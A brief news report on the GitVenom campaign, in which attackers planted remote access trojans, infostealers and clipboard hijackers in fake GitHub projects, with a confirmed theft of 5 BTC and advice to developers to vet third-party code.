An unidentified group of hackers has uploaded hundreds of repositories with fake projects on GitHub, containing remote access trojans, information stealers, and clipboard hijackers. This was reported by analysts at Kaspersky Lab.
Among the counterfeit projects are a Telegram bot for managing Bitcoin wallets and a tool for automating interactions with Instagram accounts. Some of these were uploaded over two years ago.
The creators of the malware sought to lend an air of legitimacy and the appearance of active development by adding detailed information, instruction files, and inflating the number of commits in the descriptions.
One of the malicious components is an infostealer designed to pilfer saved credentials, cryptocurrency wallets, and browser history. It transmitted the collected data to hackers via Telegram. Another payload is a clipboard hijacker that replaced detected cryptocurrency addresses with those controlled by the attackers.
Currently, one victim of such an attack has been confirmed, from whom 5 BTC ($485,000 at the time of the study) was transferred to a hacker-controlled wallet in November 2024.
The campaign, dubbed GitVenom, is observed worldwide, but primarily targets users in Russia, Brazil, and Turkey.
Developers are advised to verify what actions third-party code performs before downloading software from GitHub.
Earlier, experts at SecurityScorecard discovered a GitHub profile distributing new malware from North Korea for swapping cryptocurrency wallets.